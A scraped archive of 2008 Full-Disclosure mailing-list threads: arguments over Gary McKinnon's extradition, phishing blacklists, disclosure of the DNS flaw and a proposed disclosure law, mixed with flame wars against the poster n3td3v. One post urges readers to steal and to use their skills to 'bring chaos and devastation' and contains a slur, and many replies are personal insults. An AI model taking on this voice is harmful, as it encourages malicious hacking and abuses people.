http://www.publications.parliament.uk/pa/ld200708/ldjudgmt/jd080730/mckinn-1 .htm That link is a link to the very court brief itself on McKinnin's appeal in the UK... McKinnon should face the charges of computer crime that he's facing. He should, and will, be tried, either in the US or in the UK. But, keep in mind that it is the UK that will extradite him, and it is the UK that has ruled that he *should* be extradited for his crimes Ok, I'm done now :-) Exibar -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Kyrian Sent: Sunday, September 28, 2008 7:31 AM To: full-disclosure@lists.grok.org.uk Subject: [inbox] Re: [Full-disclosure] Supporters urge halt to hacker's,extradition to US [EMAIL PROTECTED] wrote: American officials involved in this case have stated that they want to see him 'fry'.-- BBC. [IANAL, correct me if I'm wrong, etc, but...] Yes, that's a large part of the problem. That courts *can* be bought (usually indirectly via already-bought officials, or more nasty methods), and that government officials have said the above makes it worse still. The thought that US law was apparently changed from requiring damage to systems to get a conviction to not requiring such damage, very recently, is another problem. The fact that neither the US or the UK (as far as I'm aware) actually has a sane enough legal framework for this sort of thing, or enough police (anyonewho's dealt with the UK's former High Tech Crime Unit will know this), judges (there are many examples of judges being out of touch in their rulings), etc. who are actually aware enough of the underlying technology to deal with it sensibly is another. I agree with whoever said that people should be extradited to the country in which they caused damage, but not under circumstances like these, and not when there is no agreed standard of law between the country the person would be extradited from, and the one they would go to. In the UK it still requires damage to be done for it to be a criminal offense, and that does not seem set to change. That it is possible to cause damage to (badly managed) systems by doing absolutely nothing in a lot of circumstances (as I am finding right now), that logs can be faked, and that the dividing line between probes versus actual hacking attempts is at times a very narrow one, there is plenty of reason not to agree extradite Gary. That he's autistic is probably neither here nor there, I'm afraid, as it seems to be very common for people involved in computing the be somewhere high on the autistic spectrum (even if they are not 'officially' autistic). I have taken the test. I'm not telling, but I know what I'm talking about. So, I shall be there, I won't be shouting or chanting, but I will be there. I hope that the event is not hijacked by another purpose, and that I do not get shot by the armed police at the US Embassy there (it is a scarey looking place, which puts me on edge whenever I'm near). Strangely I also find myself wondering if the staff there are paying the London congestion charge yet, rather than ignoring it...? Just my 2c, or so. K. -- Kev Green, aka Kyrian. E: kyrian#64;ore.org WWW: http://kyrian.ore.org/ Linux/Security Contractor/LAMP Coder/ISP, via http://www.orenet.co.uk/ DJ via http://www.hellnoise.co.uk
Re: [Full-disclosure] [inbox] Re: Supporters urge halt to hacker'sextraditionto US
Hmmm... I must have touched on a nerve there! Heheheh I never said that you actually DID do anything, don't be so defensive Ex -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: Saturday, September 27, 2008 6:43 AM To: full-disclosure@lists.grok.org.uk; n3td3v Cc: [EMAIL PROTECTED] Subject: Re: [Full-disclosure] [inbox] Re: Supporters urge halt to hacker'sextraditionto US You seem to think because I don't want him to goto U.S that I agree with what he did and that I do similar things? STFU. I'm a security researcher and ethical hacker, with one of the biggest groups on google groups for security researchers and ethical hackers. Why the fuck would you make up this lie about me? If I was some evil hacker that was doing bad things like you suggest, would I be drawing attention to myself on full-disclosure? You're just trolling me and you got me to bite, good luck with the rest of your mailing list career. n3td3v forever. On Sat, Sep 27, 2008 at 4:13 AM, Exibar [EMAIL PROTECTED] wrote: What if n3td3v hacked into China's Ministry of National Defense, and gets caught this time. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Comments on: Browser patches yearn to be free
wholly crap... I never thought Id see the day N3td3v actually put together a thought that is clear, concise, to the point, and that I'll bet, most of us agree with. Could our n3td3v actually be gasp maturing? Wow... Just wow! Keep it up and your public image just might change for the better! Exibar -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: Saturday, September 27, 2008 8:17 AM To: n3td3v Cc: full-disclosure@lists.grok.org.uk Subject: [inbox] [Full-disclosure] Comments on: Browser patches yearn to be free by n3td3v September 27, 2008 5:11 AM PDT Once a month stops people getting confused, and allows people to organize patch management better. You know when the patches are due to be released, so you don't miss any and get hacked when a hacker reverse engineers the patch. If you just release patches on random days, folks might get caught off guard and miss patching as quickly as they might want. Also, third party patches are the most danergous patches, so its better to know when the genuine patch is coming out. I never agreed with the whole ZERT thing, its just encouraging the bad guys to release third party patches which could be malware pretending to be a patch. Never accept third party patches, even if they are from ZERT, it sets a bad precedence. http://news.cnet.com/8601-13554_3-10052873.html?communityId=2032targetCommu nityId=2032blogId=33tag=mncol;tback#5009236 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: Supporters urge halt to hacker'sextraditionto US
Who are those American officials that the BBC is quoting? The only one that can pass sentence, is the judge himself... And he MUST be impartial... Exibar -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: Saturday, September 27, 2008 8:36 PM To: full-disclosure@lists.grok.org.uk; n3td3v; [EMAIL PROTECTED] Subject: Re: [Full-disclosure] [inbox] Re: Supporters urge halt to hacker'sextraditionto US On Sat, Sep 27, 2008 at 10:27 PM, Exibar [EMAIL PROTECTED] wrote: I lighter sentence should be given, and probably will be given... Yet the Americans haven't comforted anybody in that respect, they've said the usually rhetoric you expect to hear from them, we want to see him fry and won't give any guarantees of a lenient sentence, thats whats causing all the problems and uncertainties. If Gary Mckinnon thought he was going to get a fair trial and a fair sentence, he would have flown over. The problem arises that the U.S are noising him up and saying he is gonna fry. American officials involved in this case have stated that they want to see him 'fry'.-- BBC. All the best, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: Supporters urge halt to hacker'sextraditionto US
He faces a MAXIMUM sentence of 60 years I seriously doubt he'll get the maximum. I hear that in the UK people are calling him innocent, and that he didn't do anything wrong, he doesn't deserve to be tried The words are both with the US AND with the UK Goes both ways Exibar -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: Saturday, September 27, 2008 8:52 PM To: full-disclosure@lists.grok.org.uk; n3td3v; [EMAIL PROTECTED] Subject: Re: [Full-disclosure] [inbox] Re: Supporters urge halt to hacker'sextraditionto US If you're only going to give him 4 years, then don't say he's gonna get 60 and that he is gonna fry. This is what is causing all the problems, just say we're gonna give you 4 years if you come over. Don't come out with the usual American crap about going to fry. It really is all about the fry comment and 60 year stuff thats causing all the problems. If America isn't going to give him 60 years, then don't make out that he is with the fry comment, the language is causing a lot of issues. The Americans need to stop screwing with the guys head and be fair about whats going to happen to him, he has admitted to the crime, he has been fair with you, now you be fair with him, and stop all this gonna fry non-sence. On Sun, Sep 28, 2008 at 1:36 AM, n3td3v [EMAIL PROTECTED] wrote: On Sat, Sep 27, 2008 at 10:27 PM, Exibar [EMAIL PROTECTED] wrote: I lighter sentence should be given, and probably will be given... Yet the Americans haven't comforted anybody in that respect, they've said the usually rhetoric you expect to hear from them, we want to see him fry and won't give any guarantees of a lenient sentence, thats whats causing all the problems and uncertainties. If Gary Mckinnon thought he was going to get a fair trial and a fair sentence, he would have flown over. The problem arises that the U.S are noising him up and saying he is gonna fry. American officials involved in this case have stated that they want to see him 'fry'.-- BBC. All the best, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: Supporters urge halt to hacker's extraditionto US
This guy hacked into the Pentagon, illegally, and you don't want him to stand trial in the country that he committed the crime against? What if a US citizen hacked into UK Parliament? Would you want him tried in the US or in the UK? What if n3td3v hacked into China's Ministry of National Defense, and gets caught this time. Where would you expect to be tried, at home in the UK, or within China (you'd be executed in China for that crime by the way). This guy that hacked the pentagon will be able to bring a lawyer from the UK to help him plead his case, and all his medical records, blah blah blah He should be extradited and tried in the US for his crime against the US government. Exibar _ From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of James Matthews Sent: Friday, September 26, 2008 2:25 PM To: n3td3v Cc: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Subject: [inbox] Re: [Full-disclosure] Supporters urge halt to hacker's extraditionto US Much luck! I only see one issue. Embassy staff take as many vacations as possible (Holidays of both country's you know this if you ever needed them!!) I still hope the issue gets across! On Fri, Sep 26, 2008 at 9:54 AM, n3td3v [EMAIL PROTECTED] wrote: I hope many London-based folks can make it along to the US embassy in London on Sunday. All the best, n3td3v On Fri, Sep 26, 2008 at 5:25 PM, newsgroup [EMAIL PROTECTED] wrote: Campaigners are due to protest against the extradition outside the US embassy in London on Sunday. http://www.guardian.co.uk/technology/2008/sep/26/hacking.hitechcrime ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Monthly Hands-On Meetups
hehe, true, but n3td3v basically claims to be the foremost security person in the world... Maybe he bought EnCase and thinks he's starting a new business... Exibar -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Sunday, August 31, 2008 11:56 PM To: Exibar Cc: 'Professor Micheal Chatner'; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] [inbox] Monthly Hands-On Meetups On Sun, 31 Aug 2008 22:39:31 EDT, Exibar said: This coming from the guy who basically insults everyone on the list at any chance he gets... C'mon, you really are n3td3v right.? The phrase I just started a new job in digital forensics. would tend to indicate otherwise... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Monthly Hands-On Meetups
This coming from the guy who basically insults everyone on the list at any chance he gets... C'mon, you really are n3td3v right.? Exibar -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Professor Micheal Chatner Sent: Sunday, August 31, 2008 5:20 PM To: full-disclosure@lists.grok.org.uk Subject: [inbox] [Full-disclosure] Monthly Hands-On Meetups Hey Guys, I was wondering if anyone would like to start something like a Full-Disclosure monthly group in cities all over the world. It could be like 2600 meetings except with real security professionals because personally I don't want to even talk to someone unless they have a CEH cert. I just started a new job in digital forensics. It would be fun to meet other people who like hacking and trading Ubuntu tips and tricks! Let me know what you think! Professor Micheal Chatner, M.D., CISSP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Honeypot?
so do you work for Salsoft, or are you trying to break into a machine owned by them? If it's a network you monitor, meaning you have direct responsibility for, wouldn't you already know if it's a honeypot? sounds fishy that you have to ask Exibar _ From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of James Lay Sent: Saturday, August 30, 2008 1:26 PM To: Full-disclosure Subject: [inbox] [Full-disclosure] Honeypot? So...one of the networks I monitor has this ip: 66.139.73.183 Doing netbios scans on it. A cursory inspection shows it as a win2003 box...that's WIDE open. Could this be a honeypot that's been compromised? Curious ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Funniest thing at DefCon this year...
Was certainly the roll of 1000 stickers that was found near the (then closed) registration window, just sitting there inviting all to take a bunch of them The stickers were 4 inches round, black with white lettering, and said... N3TD3V SUCKS! I nearly fell on my ass I was laughing so hard! Of course I grabbed a crapload of them too :-) Exibar ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] UPDATE!! Funniest thing at DefCon this year...
I'll be n3td3v himself (themselves) put that n3td3v sux! Sticker roll there themselves They're pretty decent stickers too Funny as heck! Exibar -Original Message- From: Ureleet [mailto:[EMAIL PROTECTED] Sent: Thursday, August 14, 2008 11:25 AM To: Exibar Cc: full-disclosure@lists.grok.org.uk Subject: [inbox] Re: [Full-disclosure] Funniest thing at DefCon this year... and i missed em. fuck. On Thu, Aug 14, 2008 at 1:04 AM, Exibar [EMAIL PROTECTED] wrote: Was certainly the roll of 1000 stickers that was found near the (then closed) registration window, just sitting there inviting all to take a bunch of them The stickers were 4 inches round, black with white lettering, and said... N3TD3V SUCKS! I nearly fell on my ass I was laughing so hard! Of course I grabbed a crapload of them too :-) Exibar ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: simple phishing fix
ROFL, ok, you are absolutely correct... I stand humbly corrected. Can we agree there's generally, roughly, somewhere in the neighborhood of, approx 10,000 to 15,000 officially City, State or Federally recognized money savings places in the states then? Maybe more, maybe less, give or take a thousand or two... Ex - Original Message - From: Dragos Ruiu To: Exibar Cc: [EMAIL PROTECTED] ; full-disclosure@lists.grok.org.uk Sent: Thursday, July 31, 2008 2:41 AM Subject: Re: [inbox] Re: [Full-disclosure] simple phishing fix On 30-Jul-08, at 6:40 PM, Exibar wrote: does it really matter? It's certainly not 500. It's crucial... after all this is F-D where flame wars, incoherent paranoid ramblings, and arguments about semantic nitpicking are paramount.___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] simple phishing fix
No time to comment on most, but just to throw this in there: Here in the states we have a few hundred thousand different banks at least. 500 is WAY too small of a number. Credit Unions are banks, small banks, and almost every city has at least one credit union. The city I grew up in has 12 or so different credit unions, along with all the major bank branches You mentioned it's not a problem to list all the major banks, and many of the smaller banks as well. I'll pose a challenge to you, list half of the banks and credit unions here in the states by the weekend and you'll win the prize :-) Cost of sending the phishing mail is ZERO... I'll repeat, it costs the bad guys NOTHING, ZERO, ZILTCH, NADA to send out their phishing messages. They mainly use 'bot nets and compromised machines to send the mail. It doesn't matter if they send 1 message or 1 billion messages, still costs them the same, nothing. So, even if they get to scam one person, it's all profit for them. So ya, you're right on your ARPM thoughts. When it falls to nothing forever, they will stop sending their messages and move onto another scam like a 419 scam, that's been around in one form or another since the late 50's I'll tell you one thing that will help prevent Phishing... User Awareness... but even that, won't stop it Exibar - Original Message - From: lsi [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Wednesday, July 30, 2008 4:14 AM Subject: Re: [Full-disclosure] simple phishing fix Thank you all for your comments. However, I cannot disagree more fully. It doesn't matter that the blacklist is not complete, if a scammer tries to phish a bank that's not on the list, eg. is not popular, he won't make much money, because it's a small bank and the probability of him hitting an email address which works, and is an address of a customer of that tiny bank, and the customer gets suckered, and all other security mechanisms fail, is very small. The scammer knows this and so he targets the popular banks. Therefore, the blacklist only needs to contain popular banks. However there is almost no penalty to add another 500 to the list, it's a simple filter, it's fast. I do agree that the more banks on the list, the better, but there are not millions of banks in the world, it's not a problem to list all the major banks, and many of the smaller banks as well. As the blacklist is deployed, the average revenue per mail (ARPM) will fall. The more it is deployed, the more the ARPM will fall. The ARPM does not need to hit zero. As soon as the ARPM falls below the average cost to send each mail, phishing will be economically unviable. Eg. it might still be technically feasible, however it will no longer be profitable to be a phisher. Repeat, phish do not need to be completely eliminated. Once they are reduced below a certain level, it will become economically infeasible to be a phisher. The invisible hand [1] will do the rest of the work for us. Other bits: I agree that by opening a hole in your phish firewall (eg. permitting traffic from the Bank of Foo) you are making yourself slightly less protected, however if a user has a blacklist where he has to specifically ALLOW traffic from a certain bank that user will be well aware that he has opened a hole in his phish wall and will be extremely attentive when he actually gets a mail. (I'm appalled that some banks actually use email, how cheap are they? If my bank did that, I'd complain, and consider changing banks.) As with a real firewall, it's not a total solution, but one layer of several. The blacklist catches variations, of course the common variations are listed as well, again, every combination is not required, because the probabilities of failure rapidly stack up once the scammers start to get too imaginative with their variations (eg. they will have to use more and more obscure variations, which will trick less and less users). I hear unicode will make life interesting, I'm looking forward to some samples. Blacklists do work. They are successfully used in many applications, the Spamhaus blocklist, the denyhosts SSH tool and desktop AV software all spring to mind. Blacklists don't work *when the content they are checking is polymorphic*. Phish, by definition are NOT polymorphic. We are talking banks here, they do not change their names very often. I think that is an important point. The problem space is a lot smaller once you start working with a finite list of domainnames. A blacklist is feasible in these circumstances. I agree my list is small, you'll note however it contains most of the biggest banks, I didn't choose them, they self-selected, by being sent to me. That's why they are the biggest banks, because the scammers target those banks. There's obviously no reason why the list could not contain every large bank in the world
Re: [Full-disclosure] simple phishing fix
There are quite a few credit unions and smaller savings institutions that are not FDIC insured. Not to mention all the FDIC insured savings institutions that are worth less than $100 million Exibar - Original Message - From: Dragos Ruiu To: Exibar Cc: [EMAIL PROTECTED] ; full-disclosure@lists.grok.org.uk Sent: Wednesday, July 30, 2008 2:36 PM Subject: Re: [Full-disclosure] simple phishing fix On 30-Jul-08, at 9:19 AM, Exibar wrote: No time to comment on most, but just to throw this in there: Here in the states we have a few hundred thousand different banks at least. 500 is WAY too small of a number. Credit Unions are banks, small banks, and almost every city has at least one credit union. The city I grew up in has 12 or so different credit unions, along with all the major bank branches FDIC says: 4,893 banks or savings institutions have more than $100 million in assets; 3,517 have $100 to $500 million; 859 have $500 million to $5 billion; 150 have $5 to $50 billion; and 22 have more than $50 billion. Circa 2003.___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: simple phishing fix
does it really matter? It's certainly not 500. BTW, just credit unions in the states amount to 8,130 We'll let the original poster worry about keeping his black list or whitelist up to date, while the rest of us go on with our lives Exibar _ From: Dragos Ruiu [mailto:[EMAIL PROTECTED] Sent: Wednesday, July 30, 2008 4:52 PM To: Exibar Cc: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Subject: [inbox] Re: [Full-disclosure] simple phishing fix nowhere near a few hundred thousand On 30-Jul-08, at 12:29 PM, Exibar wrote: There are quite a few credit unions and smaller savings institutions that are not FDIC insured. Not to mention all the FDIC insured savings institutions that are worth less than $100 million Exibar - Original Message - From: Dragos Ruiu mailto:[EMAIL PROTECTED] To: Exibar mailto:[EMAIL PROTECTED] Cc: [EMAIL PROTECTED] ; full-disclosure@lists.grok.org.uk Sent: Wednesday, July 30, 2008 2:36 PM Subject: Re: [Full-disclosure] simple phishing fix On 30-Jul-08, at 9:19 AM, Exibar wrote: No time to comment on most, but just to throw this in there: Here in the states we have a few hundred thousand different banks at least. 500 is WAY too small of a number. Credit Unions are banks, small banks, and almost every city has at least one credit union. The city I grew up in has 12 or so different credit unions, along with all the major bank branches FDIC says: 4,893 banks or savings institutions have more than $100 million in assets; 3,517 have $100 to $500 million; 859 have $500 million to $5 billion; 150 have $5 to $50 billion; and 22 have more than $50 billion. Circa 2003. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Re: DNS spoofing issue. Thoughts on
Why are you so Jealous of HD Moore? He's done more for the community than you'll ever dream of doing. Didn't you promise to leave this list? Why are you still here anyway? Exibar -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: Saturday, July 26, 2008 6:20 PM To: full-disclosure@lists.grok.org.uk Subject: [inbox] Re: [Full-disclosure] DNS spoofing issue. Thoughts on On Sat, Jul 26, 2008 at 11:10 PM, Paul Schmehl [EMAIL PROTECTED] wrote: there *is* such a thing as criminal negligence.) Could we not charge HD Moore and I)ruid with this? All the best, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Kaminsky's Law
I think we should have n3td3v's law where n3td3v and all his aliases (professor, uleet, insert troll douche's name here, etc) are required to get signed written authorization from the community before he can post a single messageanywhere if it's not a unanimous agreement that he can post, and he does so anyway, he goes to jail - Original Message - From: n3td3v [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Friday, July 25, 2008 6:56 AM Subject: [Full-disclosure] Kaminsky's Law So what you're saying is HD Moore and |)ruid are exploiting a loop hole in the law to do what they do... looks like we need to get the law tightened. I say a Responsible Disclosure Act is drawn up, and anyone who breaks it goes to jail. That will mean: - People will think twice before hitting send on blog entries, - People will think twice about releasing code early, - That the decided time line for disclosure can be enforced, - That the people who release information and/or code early, they get fined for every computer system compromised because of the vulnerability information and/or code disclosure, on top of the jail sentence. So instead for the future its not just a verbal contract for responsible disclosure, its a legally binding contract as well meaning if the Responsible Disclosure Act has been signed by the security researcher and its affected vendors, then ass hats like HD Moore and |)ruid are breaking the law. The details are a bit fuzzy right now, but i'm sure the big guys in the industry can draw up proper rules for a Responsible Disclosure Act. Its likely the Responsible Disclosure Act would only be used in exceptional circumstances like this DNS caching vulnerability, and the approval of the act per vulnerability case has to be decided on by a judge in a court of law, so that the Responsible Disclosure Act can't be over used and abused, to keep the use of the act fair and proportional in relation to the level of the threat. That means, Full-Disclosure of vulnerability information and/or wouldn't be illegal all the time, just in exceptional circumstances that has to be OK'd by a judge. This safe guards the deployment of a patch or patches while telling what the importance of patching is to the public, while disallowing security researchers to release information and/or code before the time line for responsible disclosure. So the scenario would be, jake: hey did you hear about the patches being deployed and the news reports about the flaw and why the patch is critical? joe: yes, but the responsible disclosure act has been signed so we need to wait until it expires before we can share info. jake: no way, whats the assigned disclosure date? joe: the standard 4 weeks, although with the responsible disclosure act, after the 4 weeks, the security researcher and vendors can go back to the judge to ask for an extra 4 week extension onto that, so it could be eight weeks bro before we can become famous for five minutes by releasing attack code. jake: ah, sucks for us, but yeah if the judge has approved the signing there isn't alot we can do unless we want to be labeled criminals, and hunted down by interpol. What has to be told to the community under the act: - The community must be told the Responsible Disclosure Act has been signed and OK'd by a judge. - The community must be told the date the Responsible Disclosure Act expires and disclosure can be made. - The community must be told that security researcher and vendor can go back to the judge after 4 weeks and ask for extension of the act if extra time is needed, this must be announced to the community again with notice. All members of the community who break the Responsible Disclosure Act are breaking the law and face charges. Obviously this is just an email I rattled up in five minutes during a water machine break, so the big guys in the industry can take these ideas and throw them into a properly put together act. I think Dan Kaminsky should lobby the industry and the government to get something like this drawn up, since he is the one who has inspired me to come up with the Responsible Disclosure Act. I kind of feel sorry for Dan Kaminsky, and that HD Moore and |)ruid had to be dick heads about releasing code on purpose against his request of Dan Kaminsky, the vendors and people who agree with responsible disclosure, especially in exceptional circumstances like the DNS flaw. Maybe we should name it Kaminsky's Law out of Solidarity for Dan. All the best, n3td3v -- Forwarded message -- From: [EMAIL PROTECTED] Date: Thu, Jul 24, 2008 at 5:56 PM Subject: Re: [Full-disclosure] Comments on: DNS exploit code is in the wild To: n3td3v [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk On Thu, 24 Jul 2008 16:17:08 BST, n3td3v said: This whole HD Moore savior of info sec thing has gone on long enough,
Re: [Full-disclosure] ladies
good grief - Original Message - From: Professor Micheal Chatner [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Thursday, July 24, 2008 6:51 AM Subject: [Full-disclosure] ladies Ladies of the internet. We salute you. How does it feel having a low self-esteem. How does it feel to not have a life worth living. Notice these are statements. That's how I want you to think of the tonal range when you read this. These aren't questions. Dorks in their 40's with green hair. You're not fucking interesting. Give it up. Nerds who say But I would never hurt a computer. You disgust me. Computers aren't real. People with morals. Shut up. Nikola Tesla was a faggot. Thomas Edison ruled. Stealing is the only thing in this world worth doing. Everything else is a failed attempt at assimilation. Stop doing things that don't matter. Computer security is an illusionary mindset that is worth absolutely nothing. You protect the imaginary. Nothing you do actually matters. Nothing you attempt will ever affect anything. You're lives are fruitless and lack any form of substance. You attempt to protect nonexistent data packets that aren't physical in any cognitive reality. It's all an attempt to make you feel a sense of importance that isn't viable in nature. What is it really that you are trying to accomplish besides a useless philosophy that revolves around being a computer superhero. You aren't saving lives. You aren't saving anything. I have no idea how this industry is worth a fucking penny considering that it is run by a team of South Park watching immature socially inept idiots who have no comprehension of anything beyond lanparty's with other like-minded foolish individuals. There is no diversity there is no actual intellect there is no actual change. Why waste your time save for the fact that it lines your pocketbook with money that is created entirely by an industry that manufactures fear and adolescence in the minds of investors who are equally brainwashed. Stop wasting your time and use your skills to bring chaos and devastation to an already useless community of the mentally defected population of earth. It's really the only opportunity that is worth fulfilling. -- Professor Micheal Chatner, MD, CISSP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Joel Esler comment on Sans ISC podcast
When is this fantasy meeting going to take place? I want Press coverage! Hell post it up on you-tube with the rest of the drivel there! I vote for it happening this weekend! You know we're an impatient bunch on Full-Disclosure :-) Exibar - Original Message - From: n3td3v [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Friday, June 20, 2008 8:42 AM Subject: Re: [Full-disclosure] Fwd: Joel Esler comment on Sans ISC podcast On Fri, Jun 20, 2008 at 8:51 AM, James Rankin [EMAIL PROTECTED] wrote: Get yourself down to Durham then. Come to the Bishop's Mill where the old Gala theatre was. Not too far from Scotland. We can then discuss your plaguing of my inbox with tripe face-to-face. Why are you subscribed to an unmoderated mailing list? That will be the first question i'll ask you when we meet... All the best, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RE :OT - Don't fuck with n3td3v
n3tdunc3 said: ...mentioned a project HD Moore is working on called Metasploit and questioned weather... I honestly don't think that HD has anything to do with the weather, I wouldn't bother him about that. Although, HD does have God like status, so perhaps he CAN control the weather Hm ;-) Exibar - Original Message - From: n3td3v [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Wednesday, May 07, 2008 1:55 PM Subject: Re: [Full-disclosure] RE :OT - Don't fuck with n3td3v On Wed, May 7, 2008 at 6:31 PM, G D Fuego [EMAIL PROTECTED] wrote: Wow. That is a spot on description of how you ate treating HD Moore and David Litchfield. I mentioned a project HD Moore is working on called Metasploit and questioned weather he had managed to pick up any government contracts. I said in my opinion Metasploit is a script kiddie tool. I can't see any cyberstalking there. Secondly, I said David Litchfield's research was responsible for the SQL Slammer Worm and its a perfect example of why Responsible Disclosure is needed. Again, I can't see any Cyberstalking there. All the best, n3td3v On May 7, 2008, at 12:36 PM, n3td3v [EMAIL PROTECTED] wrote: On Wed, May 7, 2008 at 4:43 PM, [EMAIL PROTECTED] wrote: On Wed, 07 May 2008 16:24:45 BST, n3td3v said: And you suffer from slanderous libelous defamation disability disorder, a new disorder I have made up for idiots on Full-Disclosure. So you're saying he's suffering from a disorder that causes a disability in how well he can slander, libel, and defame somebody? If so, you should be glad that you weren't slandered by somebody *not* suffering from it Maybe not, but the situation currently on Full-Disclosure is this... False accusations. Many cyberstalkers try to damage the reputation of their victim and turn other people against them. They post false information about them on websites. They may set up their own websites, blogs or user pages for this purpose. They post allegations about the victim to newsgroups, chat rooms or other sites that allow public contributions, such as Wikipedia or Amazon.com.[4] Attempts to gather information about the victim. Cyberstalkers may approach their victim's friends, family and work colleagues to obtain personal information. They may advertise for information on the Internet, or hire a private detective. They often will monitor the victim's online activities and attempt to trace their IP address in an effort to gather more information about their victims. [5] Encouraging others to harass the victim. Many cyberstalkers try to involve third parties in the harassment. They may claim the victim has harmed the stalker or his/her family in some way, or may post the victim's name and telephone number in order to encourage others to join the pursuit. False victimization. The cyberstalker will claim that the victim is harassing him/her. Bocij writes that this phenomenon has been noted in a number of well-known cases. Attacks on data and equipment. They may try to damage the victim's computer by sending viruses. Ordering goods and services. They order items or subscribe to magazines in the victim's name. These often involve subscriptions to pornography or ordering sex toys then having them delivered to the victim's workplace. Arranging to meet. Young people face a particularly high risk of having cyberstalkers try to set up meetings between them.[6] Cyberstalkers meet or target their victims by using search engines, online forums, bulletin and discussion boards, chat rooms, Wikipedia, and more recently, through online communities such as MySpace, Facebook, Friendster and Indymedia, a media outlet known for self-publishing. They may engage in live chat harassment or flaming or they may 